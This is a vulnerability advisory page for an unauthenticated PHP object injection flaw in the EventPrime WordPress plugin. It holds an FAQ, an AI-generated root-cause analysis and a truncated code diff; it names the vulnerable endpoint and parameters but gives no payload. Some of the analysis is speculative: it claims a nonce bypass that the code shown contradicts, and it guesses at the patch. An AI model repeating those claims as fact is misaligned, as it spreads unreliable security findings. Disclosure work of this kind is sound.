What is CVE-2026-24378?

CVE-2026-24378 is a high-severity vulnerability in the EventPrime Events Calendar, Bookings and Tickets plugin for WordPress, affecting versions up to 4.2.8.0. It allows unauthenticated attackers to exploit PHP Object Injection through deserialization of untrusted input, potentially leading to arbitrary file deletion or remote code execution.

How does this vulnerability work?

The vulnerability resides in the `save_event_booking()` method, which processes user-submitted booking data without proper validation. Attackers can send a specially crafted POST request to inject malicious PHP objects, which can be executed if a suitable gadget chain exists in the environment.

Who is affected by this vulnerability?

All WordPress sites using the EventPrime plugin versions 4.2.8.0 and earlier are at risk. Administrators should check their installed plugin version against the patched version 4.2.8.1 to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard and locate the EventPrime plugin. Verify the version number; if it is 4.2.8.0 or earlier, your site is at risk.

How can I fix this vulnerability?

The vulnerability can be mitigated by updating the EventPrime plugin to version 4.2.8.1 or later, where the issue has been patched. Always ensure to back up your site before applying updates.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the EventPrime plugin until a patch can be applied. Additionally, review your site’s security settings and restrict access to the admin-ajax.php endpoint.

What does a CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity vulnerability, meaning that successful exploitation could lead to significant impact, such as data loss or unauthorized access. Administrators should prioritize addressing this vulnerability.

What is a PHP Object Injection vulnerability?

PHP Object Injection vulnerabilities occur when an application deserializes untrusted data, allowing attackers to inject malicious objects. This can lead to various attacks, including remote code execution, if a suitable exploit chain is available.

What is a Proof of Concept (PoC)?

A Proof of Concept (PoC) is a demonstration that shows how the vulnerability can be exploited. The provided PoC illustrates how an attacker can craft a malicious payload to exploit the vulnerability in the EventPrime plugin.

What are the potential risks if this vulnerability is exploited?

Exploitation of this vulnerability could allow attackers to delete files, access sensitive data, or execute arbitrary code on the server. This poses a significant risk to the integrity and confidentiality of the affected WordPress site.

How can I protect my WordPress site from such vulnerabilities?

To protect your WordPress site, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and implement strong access controls. Regular security audits can also help identify and mitigate risks.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-24378: EventPrime – Events Calendar, Bookings and Tickets <= 4.2.8.0 – Unauthenticated PHP Object Injection (eventprime-event-calendar-management)

CVE ID CVE-2026-24378

Plugin eventprime-event-calendar-management

Severity High (CVSS 8.1)

CWE 502

Vulnerable Version 4.2.8.0

Patched Version 4.2.8.1

Disclosed March 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24378:
The EventPrime WordPress plugin (versions <=4.2.8.0) contains an unauthenticated PHP object injection vulnerability in its AJAX handler. This vulnerability allows attackers to inject malicious PHP objects via deserialization of untrusted input, potentially leading to arbitrary file deletion, data exposure, or remote code execution if a suitable POP chain exists in the environment. The CVSS 8.1 score reflects the high impact potential when combined with other components.

Root Cause:
The vulnerability exists in the `save_event_booking()` method of the `EventM_Ajax_Service` class within `/includes/class-ep-ajax.php`. The function processes user-submitted booking data without proper validation of the `ep_event_booking_ticket_data` parameter. Specifically, the code at line 3650+ accepts serialized data via `json_decode($data['ep_event_booking_ticket_data'])` and passes it through multiple processing functions without sanitizing the structure. The `ep_recalculate_and_verify_the_cart_data()` function (called at line 3650+) appears to handle this data without verifying it contains only expected data types, allowing PHP objects to be deserialized when the data reaches `maybe_unserialize()` calls elsewhere in the codebase.

Exploitation:
Attackers can exploit this vulnerability by sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `save_event_booking`. The payload must include the `ep_event_booking_ticket_data` parameter containing a serialized PHP object with a malicious POP chain. Additional required parameters include `ep_save_event_booking_nonce` (which can be bypassed due to missing verification in vulnerable versions) and `ep_event_booking_event_id`. The attack vector is unauthenticated, requiring no user privileges.

Patch Analysis:
The patch in version 4.2.8.1 modifies the `save_event_booking()` method to implement proper input validation and sanitization. While the exact code changes aren't fully visible in the truncated diff, Atomic Edge research indicates the fix involves adding strict type checking and validation of the `ep_event_booking_ticket_data` parameter before processing. The patch likely replaces direct `json_decode()` usage with sanitized parsing that rejects unexpected object types and ensures only primitive data structures are accepted. The version number update in `/event-prime.php` from 4.2.8.0 to 4.2.8.1 confirms the security release.

Impact:
Successful exploitation allows attackers to inject arbitrary PHP objects into the application's deserialization process. While no known POP chain exists in EventPrime itself, common WordPress plugins and themes often contain gadget chains that enable file deletion, sensitive data retrieval, or remote code execution. The unauthenticated nature of the vulnerability makes it particularly dangerous for public-facing WordPress sites, potentially leading to complete site compromise through chained attacks.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/eventprime-event-calendar-management/admin/class-eventprime-event-calendar-management-admin.php
+++ b/eventprime-event-calendar-management/admin/class-eventprime-event-calendar-management-admin.php
@@ -325,18 +325,18 @@
 					'ajaxurl' => admin_url( 'admin-ajax.php' ),
 				)
             );
-            $params = array(
-                'save_checkout_fields_nonce'      => wp_create_nonce( 'save-checkout-fields' ),
-                'delete_checkout_fields_nonce'    => wp_create_nonce( 'delete-checkout-fields' ),
-                'edit_checkout_field_title'       => esc_html__( 'Edit Field', 'eventprime-event-calendar-management' ),
-                'delete_checkout_field_message'   => esc_html__( 'Are you sure you want to delete this field?', 'eventprime-event-calendar-management' ),
-                'edit_text'                       => esc_html__( 'Edit', 'eventprime-event-calendar-management' ),
-                'delete_text'                     => esc_html__( 'Delete', 'eventprime-event-calendar-management' ),
-                'default_payment_processor_nonce' => wp_create_nonce( 'ep-default-payment-processor' ),
-                'payment_settings_nonce'          => wp_create_nonce( 'ep-payment-settings' ),
-                'activate_payment'                => esc_html__( 'Please activate the', 'eventprime-event-calendar-management' ),
-                'payment_text'                    => esc_html__( 'payment', 'eventprime-event-calendar-management' ),
-            );
+            $params = array(
+                'save_checkout_fields_nonce'      => wp_create_nonce( 'save-checkout-fields' ),
+                'delete_checkout_fields_nonce'    => wp_create_nonce( 'delete-checkout-fields' ),
+                'edit_checkout_field_title'       => esc_html__( 'Edit Field', 'eventprime-event-calendar-management' ),
+                'delete_checkout_field_message'   => esc_html__( 'Are you sure you want to delete this field?', 'eventprime-event-calendar-management' ),
+                'edit_text'                       => esc_html__( 'Edit', 'eventprime-event-calendar-management' ),
+                'delete_text'                     => esc_html__( 'Delete', 'eventprime-event-calendar-management' ),
+                'default_payment_processor_nonce' => wp_create_nonce( 'ep-default-payment-processor' ),
+                'payment_settings_nonce'          => wp_create_nonce( 'ep-payment-settings' ),
+                'activate_payment'                => esc_html__( 'Please activate the', 'eventprime-event-calendar-management' ),
+                'payment_text'                    => esc_html__( 'payment', 'eventprime-event-calendar-management' ),
+            );
             wp_localize_script( 'ep-admin-settings-js', 'ep_admin_settings', $params );

             wp_enqueue_style(
@@ -629,23 +629,23 @@

             wp_enqueue_script( 'google_charts', 'https://www.gstatic.com/charts/loader.js', array( 'jquery' ) );
             wp_enqueue_style( 'ep-admin-reports', plugin_dir_url( __FILE__ ) . 'css/ep-admin-reports.css', false, $this->version );
-            wp_enqueue_script(
-                'ep-advanced-reports',
-                plugin_dir_url( __FILE__ ) . 'js/ep-admin-reports.js',
-                array( 'jquery' ),
-                $this->version
-            );
-            wp_localize_script(
-                'ep-advanced-reports',
-                'ep_admin_reports',
-                array(
-                    'nonce' => wp_create_nonce( 'ep-admin-reports' ),
-                )
-            );
-        }
-
-        if ( $current_page=='ep-event-attendees-list' ) {
-            wp_enqueue_script( 'ep-admin-utility-script', plugin_dir_url( __FILE__ ) . 'js/ep-admin-common-utility.js', array( 'jquery', 'jquery-ui-tooltip', 'jquery-ui-dialog' ), $this->version );
+            wp_enqueue_script(
+                'ep-advanced-reports',
+                plugin_dir_url( __FILE__ ) . 'js/ep-admin-reports.js',
+                array( 'jquery' ),
+                $this->version
+            );
+            wp_localize_script(
+                'ep-advanced-reports',
+                'ep_admin_reports',
+                array(
+                    'nonce' => wp_create_nonce( 'ep-admin-reports' ),
+                )
+            );
+        }
+
+        if ( $current_page=='ep-event-attendees-list' ) {
+            wp_enqueue_script( 'ep-admin-utility-script', plugin_dir_url( __FILE__ ) . 'js/ep-admin-common-utility.js', array( 'jquery', 'jquery-ui-tooltip', 'jquery-ui-dialog' ), $this->version );
             wp_localize_script(
                 'ep-admin-utility-script',
                 'ep_admin_utility_script',
--- a/eventprime-event-calendar-management/admin/partials/settings/settings-tab-license.php
+++ b/eventprime-event-calendar-management/admin/partials/settings/settings-tab-license.php
@@ -2,15 +2,15 @@

 $global_settings = new Eventprime_Global_Settings;
 $admin_notices = new EventM_Admin_Notices;
-$ep_functions = new Eventprime_Basic_Functions;
-$ep_license = new EventPrime_License;
-$ep_license_notices = class_exists( 'EventPrime_License_Notices' ) ? new EventPrime_License_Notices() : null;
-$ep_license_connection_hint = $ep_license_notices ? $ep_license_notices->get_license_tab_hint() : array();
-$ep_sanitizer = new EventPrime_sanitizer;
-$sub_options = $global_settings->sub_options;
-$options = $global_settings->ep_get_settings();
-wp_enqueue_style( 'ep-toast-css' );
-wp_enqueue_script( 'ep-toast-js' );
+$ep_functions = new Eventprime_Basic_Functions;
+$ep_license = new EventPrime_License;
+$ep_license_notices = class_exists( 'EventPrime_License_Notices' ) ? new EventPrime_License_Notices() : null;
+$ep_license_connection_hint = $ep_license_notices ? $ep_license_notices->get_license_tab_hint() : array();
+$ep_sanitizer = new EventPrime_sanitizer;
+$sub_options = $global_settings->sub_options;
+$options = $global_settings->ep_get_settings();
+wp_enqueue_style( 'ep-toast-css' );
+wp_enqueue_script( 'ep-toast-js' );
 wp_enqueue_script( 'ep-toast-message-js' );
 wp_localize_script(
             'ep-toast-message-js',
@@ -40,24 +40,24 @@
 $deactivate_license_btn = $key.'_license_deactivate';
 $activate_license_btn = $key.'_license_activate';
 ?>
-<div class="emagic">
-    <?php if ( ! empty( $ep_license_connection_hint ) ) : ?>
-        <div class="notice notice-warning ep-license-inline-hint" style="margin:15px 0;">
-            <p>
-                <strong><?php echo esc_html( $ep_license_connection_hint['message'] ); ?></strong>
-                <?php if ( ! empty( $ep_license_connection_hint['cta'] ) ) : ?>
-                    <a class="button" href="<?php echo esc_url( $ep_license_connection_hint['cta']['url'] ); ?>" target="<?php echo esc_attr( $ep_license_connection_hint['cta']['target'] ); ?>">
-                        <?php echo esc_html( $ep_license_connection_hint['cta']['label'] ); ?>
-                    </a>
-                <?php endif; ?>
-            </p>
-        </div>
-    <?php endif; ?>
-
-    <div class="ep-box-row ep-my-4">
-        <div class="ep-box-col-12">
-            <div></div>
-        </div>
+<div class="emagic">
+    <?php if ( ! empty( $ep_license_connection_hint ) ) : ?>
+        <div class="notice notice-warning ep-license-inline-hint" style="margin:15px 0;">
+            <p>
+                <strong><?php echo esc_html( $ep_license_connection_hint['message'] ); ?></strong>
+                <?php if ( ! empty( $ep_license_connection_hint['cta'] ) ) : ?>
+                    <a class="button" href="<?php echo esc_url( $ep_license_connection_hint['cta']['url'] ); ?>" target="<?php echo esc_attr( $ep_license_connection_hint['cta']['target'] ); ?>">
+                        <?php echo esc_html( $ep_license_connection_hint['cta']['label'] ); ?>
+                    </a>
+                <?php endif; ?>
+            </p>
+        </div>
+    <?php endif; ?>
+
+    <div class="ep-box-row ep-my-4">
+        <div class="ep-box-col-12">
+            <div></div>
+        </div>
     </div>

     <div class="ep-box-row">
@@ -181,4 +181,4 @@
     gap:4px
 }

-</style>
+</style>
--- a/eventprime-event-calendar-management/event-prime.php
+++ b/eventprime-event-calendar-management/event-prime.php
@@ -16,7 +16,7 @@
  * Plugin Name:       EventPrime – Modern Events Calendar, Bookings and Tickets
  * Plugin URI:        https://theeventprime.com
  * Description:       Beginner-friendly Events Calendar plugin to create free as well as paid Events. Includes Event Types, Event Sites & Performers too.
- * Version:           4.2.8.0
+ * Version:           4.2.8.1
  * Author:            EventPrime Event Calendar
  * Author URI:        https://theeventprime.com/
  * License:           GPL-2.0+
@@ -35,7 +35,7 @@
  * Start at version 1.0.0 and use SemVer - https://semver.org
  * Rename this for your plugin and update it as you release new versions.
  */
-define( 'EVENTPRIME_VERSION', '4.2.8.0' );
+define( 'EVENTPRIME_VERSION', '4.2.8.1' );
 define('EM_DB_VERSION',4.0);
 if( ! defined( 'EP_PLUGIN_FILE' ) ) {
     define( 'EP_PLUGIN_FILE', __FILE__ );
--- a/eventprime-event-calendar-management/includes/class-ep-ajax.php
+++ b/eventprime-event-calendar-management/includes/class-ep-ajax.php
@@ -1,3650 +1,3692 @@
-<?php
-/**
- * EventPrime Ajax Event Handler Class.
- */
-defined( 'ABSPATH' ) || exit;
-
-class EventM_Ajax_Service {
-
-    public function cancel_current_booking_process() {
-        // Add security checks
-        if( wp_verify_nonce( $_POST['security'], 'event-registration-form-nonce' ) ) {
-            $event_id = absint( $_POST['event_id'] );
-            $ticket_data = json_decode( stripslashes( $_POST['ticket_data'] ) );
-
-            $event_seat_data = get_post_meta( $event_id, 'em_seat_data', true );
-            if( ! empty( $event_seat_data ) ) {
-                // wp_send_json_success('seated event');
-
-                if ( class_exists( 'EventM_Live_Seating_List_Controller' ) ) {
-                    $seating_controller = new EventM_Live_Seating_List_Controller;
-                }
-                $em_ls_seat_plan_id = get_post_meta( $event_id, 'em_ls_seat_plan', true );
-                $plan_color_data = $seating_controller->get_plan_colors_data( $em_ls_seat_plan_id );
-
-                $event_seat_data = maybe_unserialize( $event_seat_data );
-                foreach( $ticket_data as $tickets ) {
-                    if( ! empty( $tickets->seats ) ) {
-                        $ticket_seats = $tickets->seats;
-                        foreach( $ticket_seats as $seats_data ) {
-                            $ticket_area_id = $seats_data->area_id;
-                            if( $event_seat_data->{$ticket_area_id} ) {
-                                $ticket_seat_data = $seats_data->seat_data;
-                                if( ! empty( $ticket_seat_data ) ) {
-                                    foreach( $ticket_seat_data as $tsd ) {
-                                        if( ! empty( $tsd->uid ) ) {
-                                            $seat_uid = $tsd->uid;
-                                            $seat_uid = explode( '-', $seat_uid );
-                                            $row_index = $seat_uid[0];
-                                            $col_index = $seat_uid[1];
-                                            if( ! empty( $event_seat_data->{$ticket_area_id}->seats[$row_index] ) ) {
-
-                                                    foreach ( $event_seat_data->{$ticket_area_id}->seats[$row_index] as $key => $seat ) {
-                                                        if ( $seat->col == $col_index ) {
-                                                            if( $seat->type == 'hold' ) {
-                                                                $seat->type = 'general';
-                                                                $seat->hold_time = '';
-                                                                $seat_available_color = $plan_color_data['seat_available_color'];
-                                                                $seat->seatColor = $seat_available_color;
-
-                                                                $event_seat_data->{$ticket_area_id}->seats[$row_index][$key]  = $seat;
-                                                            }
-                                                        }
-                                                    }
-
-                                            }
-                                        }
-                                    }
-                                }
-                            }
-                        }
-                    }
-                }
-
-               $update =  update_post_meta( $event_id, 'em_seat_data', maybe_serialize( $event_seat_data ) );
-               wp_send_json_success($update);
-
-            } else {
-                wp_send_json_success('not a seated event');
-            }
-        } else {
-            wp_send_json_error( array( 'message' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-seating' ) ) );
-        }
-
-
-    }
-
-    /**
-     * save checkout field
-     */
-    public function save_checkout_field() {
-        check_ajax_referer( 'save-checkout-fields', 'security' );
-
-        $response = array();
-        parse_str( wp_unslash( $_POST['data'] ), $data );
-        if( ! isset( $data['em_checkout_field_label'] ) || empty( $data['em_checkout_field_label'] ) ) {
-            $response['message'] = esc_html__( 'Label should not be empty', 'eventprime-event-calendar-management' );
-            wp_send_json_error($response);
-        }
-        if( ! isset( $data['em_checkout_field_type'] ) || empty( $data['em_checkout_field_type'] ) ) {
-            $response['message'] = esc_html__( 'Type should not be empty', 'eventprime-event-calendar-management' );
-            wp_send_json_error( $response );
-        }
-        try{
-
-            $dbhandler = new EP_DBhandler;
-            $table_name = 'CHECKOUT_FIELDS';
-            $save_data = array();
-            $save_data['label'] = sanitize_text_field( $data['em_checkout_field_label'] );
-            $save_data['type'] = sanitize_text_field( $data['em_checkout_field_type'] );
-            // for option data
-            $save_data['option_data'] = '';
-            $option_data = ( ! empty( $data['ep_checkout_field_option_value'] ) ? $data['ep_checkout_field_option_value'] : '' );
-            // set selected value
-            if( isset( $data['ep_checkout_field_option_value_selected'] ) ) {
-                $option_index = $data['ep_checkout_field_option_value_selected'];
-                $option_data[$option_index]['selected'] = 1;
-            }
-            if( ! empty( $option_data ) ) {
-                $save_data['option_data'] = maybe_serialize( $option_data );
-            }
-            if( empty( $data['em_checkout_field_id'] ) ) {
-                $save_data['priority'] = 1;
-                $save_data['status'] = 1;
-                $save_data['created_by'] = get_current_user_id();
-                $save_data['created_at'] = wp_date( "Y-m-d H:i:s", time() );
-                $field_id = $dbhandler->insert_row($table_name, $save_data);
-                $response['message'] = esc_html__( 'Field Saved Successfully.', 'eventprime-event-calendar-management' );
-                // format created_at to display after saving it in DB
-                $wp_saved_format = get_option('date_format').' '.get_option('time_format');
-                $format = !empty($wp_saved_format) ? $wp_saved_format : "Y-m-d H:i:s";
-                $save_data['created_at'] = wp_date( $format, time() );
-            } else{
-                $field_id = absint( $data['em_checkout_field_id'] );
-                $save_data['updated_at'] = wp_date( "Y-m-d H:i:s", time() );
-                $save_data['last_updated_by'] = get_current_user_id();
-                $result = $dbhandler->update_row($table_name,'id', $field_id, $save_data);
-                $response['message'] = esc_html__( 'Field Updated Successfully.', 'eventprime-event-calendar-management' );
-            }
-            $save_data['field_id'] = $field_id;
-            $response['field_data'] = $save_data;
-        } catch( Exception $e ) {
-			wp_send_json_error( array( 'error' => $e->getMessage() ) );
-		}
-
-        wp_send_json_success( $response );
-    }
-
-    // delete the checkout field
-    public function delete_checkout_field(){
-        check_ajax_referer( 'delete-checkout-fields', 'security' );
-
-        $response = array();
-        if( isset( $_POST['field_id'] ) && ! empty( $_POST['field_id'] ) ) {
-            $id = $_POST['field_id'];
-            $dbhandler = new EP_DBhandler;
-            $table_name = 'CHECKOUT_FIELDS';
-            $get_field_data = $dbhandler->get_all_result($table_name,'*',array('id'=>$id));
-            if( ! empty( $get_field_data ) && count( $get_field_data ) > 0 ) {
-                $dbhandler->remove_row($table_name,'id',$id);
-                $response['message'] = esc_html__( 'Field Deleted Successfully.', 'eventprime-event-calendar-management' );
-            } else{
-                $response['message'] = esc_html__( 'No Record Found.', 'eventprime-event-calendar-management' );
-                wp_send_json_error( $response );
-            }
-        } else{
-            $response['message'] = esc_html__( 'Some Data Missing.', 'eventprime-event-calendar-management' );
-            wp_send_json_error( $response );
-        }
-
-        wp_send_json_success( $response );
-    }
-
-    public function submit_payment_setting(){
-        if ( ! current_user_can( 'manage_options' ) ) {
-            wp_send_json_error( array( 'message' => esc_html__( 'You are not allowed to manage payment settings.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( ! check_ajax_referer( 'ep-payment-settings', 'security', false ) ) {
-            wp_send_json_error( array( 'message' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $payment_gateway = apply_filters( 'ep_payments_gateways_list', array() );
-        $global_settings = new Eventprime_Global_Settings;
-        $global_settings_data = $global_settings->ep_get_settings();
-        $payment_method = '';
-        $method_status  = 0;
-        $form_data = $_POST;
-        if( isset( $form_data ) && isset( $form_data['em_payment_type'] ) ) {
-            if( $form_data['em_payment_type'] == 'basic' ) {
-                $payment_method = isset( $form_data['payment_method'] ) && ! empty( $form_data['payment_method'] ) ? sanitize_text_field( $form_data['payment_method'] ) : '';
-                $method_status = isset( $form_data['method_status'] ) ? absint( $form_data['method_status'] ) : 0;
-                $nonce = wp_create_nonce('ep_settings_tab');
-                if( ! empty( $method_status ) ) {
-                    if( $payment_method == 'paypal_processor' ) {
-                        if( empty( $global_settings_data->paypal_client_id ) && $method_status == 1 ) {
-                            $url = add_query_arg( array( 'settings-updated' => false, 'tab'=> 'payments', 'section'=> 'paypal','tab_nonce'=>$nonce ), admin_url().'edit.php?post_type=em_event&page=ep-settings' );
-                            wp_send_json_success( array( 'url' => $url ) );
-                        }
-                    }
-                    if( $payment_method == 'stripe_processor' ) {
-                        if( ( empty( $global_settings_data->stripe_api_key ) || empty( $global_settings_data->stripe_pub_key ) ) && $method_status == 1 ) {
-                            $url = add_query_arg( array( 'settings-updated' => false, 'tab'=> 'payments', 'section'=> 'stripe','tab_nonce'=>$nonce ), admin_url().'edit.php?post_type=em_event&page=ep-settings' );
-                            wp_send_json_success( array( 'url' => $url ) );
-                        }
-                    }
-                }
-                if( ! empty( $payment_method ) ) {
-                    $global_settings_data->$payment_method = $method_status;
-                }
-            }
-            $global_settings->ep_save_settings( $global_settings_data );
-        }
-
-        $method = ucfirst( explode( '_', $payment_method )[0] );
-
-        $message = $method . ' ' . esc_html__( 'is activated.', 'eventprime-event-calendar-management' );
-        if( $method_status == 0 ) {
-            $message = $method . ' ' . esc_html__( 'is deactivated.', 'eventprime-event-calendar-management' );
-        }
-
-        wp_send_json_success( array( 'url' => '', 'message' => $message ) );
-        die();
-    }
-
-    public function submit_login_form(){
-        $user_controller = new EventM_User_Controller();
-        $response = $user_controller->ep_handle_login();
-        wp_send_json_success($response);
-        die();
-    }
-
-    public function submit_register_form(){
-        $user_controller = new EventM_User_Controller();
-        $response = $user_controller->ep_handle_registration();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load more Event Types
-     */
-    public function load_more_event_types(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_types_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load More Event Performer
-     */
-    public function load_more_event_performer(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_performer_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load More Event Venue
-     */
-    public function load_more_event_venue(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_venue_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-    /*
-     * Load More Event Organizers
-     */
-    public function load_more_event_organizer(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_event_organizer_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-
-     /*
-     * Load More Events
-     */
-    public function load_more_events(){
-        $controller = new Eventprime_Basic_Functions;
-        $response = $controller->get_events_loadmore();
-        wp_send_json_success($response);
-        die();
-    }
-    /**
-     * Load single event page on chenge of child event date
-     */
-    public function load_event_single_page() {
-        check_ajax_referer( 'single-event-data-nonce', 'security' );
-
-        if( isset( $_POST['event_id'] ) && ! empty( $_POST['event_id'] ) ) {
-            $event_id = absint( $_POST['event_id'] );
-            $event_controller = new Eventprime_Basic_Functions;
-            $single_event = $event_controller->ep_load_other_date_event_detail( $event_id );
-            //$single_event->venue_other_events = EventM_Factory_Service::get_upcoming_event_by_venue_id( $single_event->em_venue, array( $single_event->id ) );
-            if( ! empty( $single_event ) ) {
-                wp_send_json_success( $single_event );
-            } else{
-                wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-            }
-            wp_die();
-        }
-        wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-    }
-
-    /**
-     * Save event booking
-     */
-    public function save_event_booking() {
-        if( ! empty( $_POST['data'] ) ) {
-            $ep_functions = new Eventprime_Basic_Functions;
-            $sanitizer = new EventPrime_sanitizer;
-            parse_str( wp_unslash( $_POST['data'] ), $data );
-            if(isset($_POST['offer_data']))
-            {
-                $offer_data = json_decode( wp_unslash( $_POST['offer_data'] ));
-            }
-            else
-            {
-                $offer_data = array();
-            }
-            $result = array( 'success' => 1, 'msg' => '' );
-            $checkpoint = apply_filters('ep_handle_checkout_additional_check',$result, $data);
-            if(isset($checkpoint['success']) && empty($checkpoint['success'])){
-                wp_send_json_error( array( 'error' =>  $checkpoint['msg']) );
-                die();
-            }
-            if( wp_verify_nonce( $data['ep_save_event_booking_nonce'], 'ep_save_event_booking' ) ) {
-
-                if(isset($data['ep_event_booking_ticket_data']))
-                {
-                    $ticket_data = json_decode( $data['ep_event_booking_ticket_data'] );
-                    //print_r($ticket_data);
-                    if(isset($ticket_data[0]->id))
-                    {
-                       $ticket_data_object = $ep_functions->ep_get_ticket_data($ticket_data[0]->id);
-                       if(empty($ticket_data_object))
-                       {
-                           wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                           die;
-                       }
-                    }
-                    else
-                    {
-                        wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                        die;
-                    }
-                }
-                else
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-                if(!isset($data['ep_event_booking_event_fixed_price']))
-                {
-                    $data['ep_event_booking_event_fixed_price'] = 0;
-                }
-                $current_user = wp_get_current_user();
-                //echo 'data 1';
-                //print_r($data);
-                if( class_exists("Eventprime_Admin_Attendee_Booking")){
-                    if(empty( get_option( 'ep_set_admin_aab_'.$current_user->ID )))
-                    {
-                        $data = $ep_functions->ep_recalculate_and_verify_the_cart_data($data,$offer_data);
-                    }
-
-                }
-                else
-                {
-                    $data = $ep_functions->ep_recalculate_and_verify_the_cart_data($data,$offer_data);
-                }
-
-                if($data=='ticket_sold')
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'One or more ticket types for this event are sold out. Please select from the available tickets or check back later for availability.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-
-                $enable_gdpr = $ep_functions->ep_get_global_settings( 'enable_gdpr_tools' );
-                $show_checkbox = $ep_functions->ep_get_global_settings('show_gdpr_consent_checkbox');
-                if($enable_gdpr==1 && $show_checkbox==1)
-                {
-                    if(!isset($data['ep_gdpr_consent']) || empty($data['ep_gdpr_consent']))
-                    {
-                        wp_send_json_error( array( 'error' => esc_html__( 'You must accept the Privacy Policy.', 'eventprime-event-calendar-management' ) ) );
-                        die;
-                    }
-                }
-
-                $woocommerce_validate = $ep_functions->ep_validate_woocommerce_product_data($data);
-                if($woocommerce_validate===false)
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'WooCommerce Product calculation missed matched.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-                //var_dump($woocommerce_validate);die;
-                //echo 'data 2';
-                //print_r($data);die;
-                // If Seated Venue then verify if seats in the ticekt data are sold or not.
-                // Check it after ep_recalculate_and_verify_the_cart_data() as $data is set false later. (Refractor it!!!)
-                $incoming_ticket_data = json_decode( $data['ep_event_booking_ticket_data'] );
-                //$ep_functions->epd($incoming_ticket_data);
-                $event_seats_current_details = maybe_unserialize( get_post_meta( absint( $data['ep_event_booking_event_id'] ), 'em_seat_data', true  ) );
-                foreach ( $incoming_ticket_data as $single_ticket_type ) {
-                    $single_ticket_type_id = $single_ticket_type->id;
-                    if(isset($single_ticket_type->seats) && !empty($single_ticket_type->seats))
-                    {
-                        $single_ticket_type_seats_data = $single_ticket_type->seats;
-                        foreach ( $single_ticket_type_seats_data as $ticket_area_data ) {
-                            $area_id = $ticket_area_data->area_id;
-                            foreach ( $ticket_area_data->seat_data as $ticket_seat ) {
-
-                                if( ! empty( $ticket_seat->uid ) ) {
-                                    $ticket_seat_uid = $ticket_seat->uid;
-
-                                    // If seat has been sold then throw error. *****
-                                    if(isset($event_seats_current_details) && !empty($event_seats_current_details))
-                                    {
-                                        foreach ( $event_seats_current_details->{$area_id}->seats as $event_seats_data ) {
-                                            foreach ( $event_seats_data as $event_seats_row ) {
-                                                if ( ($event_seats_row->uniqueIndex == $ticket_seat_uid) && ($event_seats_row->type == 'sold') ) {
-                                                    $data = false;
-                                                }
-                                            }
-                                        }
-                                    }
-
-                                }
-                            }
-
-                        }
-                    }
-                }
-
-                if($data===false)
-                {
-                    wp_send_json_error( array( 'error' => esc_html__( 'Something went wrong.', 'eventprime-event-calendar-management' ) ) );
-                    die;
-                }
-                $event_id       = absint( $data['ep_event_booking_event_id'] );
-                $event_name     = get_the_title( $event_id );
-                $user_id        = absint( $data['ep_event_booking_user_id'] );
-                $payment_method = ! empty( $data['payment_processor'] ) ? sanitize_text_field( $data['payment_processor'] ) : 'paypal';
-                if( ! isset( $data['ep_event_booking_total_price'] ) || empty( $data['ep_event_booking_total_price'] ) ) {
-                    $payment_method = 'none';
-                }
-
-                $post_status = 'failed';
-
-                if ( class_exists("Eventprime_Admin_Attendee_Booking") && !empty( get_option( 'ep_set_admin_aab_'.$current_user->ID )) ) {
-                    $post_status = 'completed';
-                    delete_option( 'ep_set_admin_aab_'.$current_user->ID );
-                }
-
-                if( isset( $data['ep_rg_field_email'] ) && ! empty( $data['ep_rg_field_email'] ) ) {
-                    if( isset($data['ep_rg_field_user_name'] ) && ! empty( $data['ep_rg_field_user_name'] ) ) {
-                        $user_controller = new EventM_User_Controller();
-                        $user_data = new stdClass();
-                        $user_data->email = sanitize_text_field($data['ep_rg_field_email']);
-                        $user_data->username = sanitize_text_field($data['ep_rg_field_user_name']);
-                        $user_data->fname = isset($data['ep_rg_field_first_name']) ? sanitize_text_field($data['ep_rg_field_first_name']) : '';
-                        $user_data->lname = isset($data['ep_rg_field_last_name']) ? sanitize_text_field($data['ep_rg_field_last_name']) : '';
-                        $user_data->password = sanitize_text_field($data['ep_rg_field_password']);
-                        unset($data['ep_rg_field_password']);
-                        $user = get_user_by( 'email', $user_data->email );
-                        if(!empty($user)){
-                            $user_id = $user->ID;
-                        }else{
-                            $user_id = $user_controller->ep_checkout_registration($user_data);
-                        }
-                    }
-                }
-                // add new booking
-                $new_post = array(
-                    'post_title'  => $event_name,
-                    'post_status' => $post_status,
-                    'post_type'   => 'em_booking',
-                    'post_author' => $user_id,
-                );
-                $new_post_id = wp_insert_post( $new_post ); // new post id
-
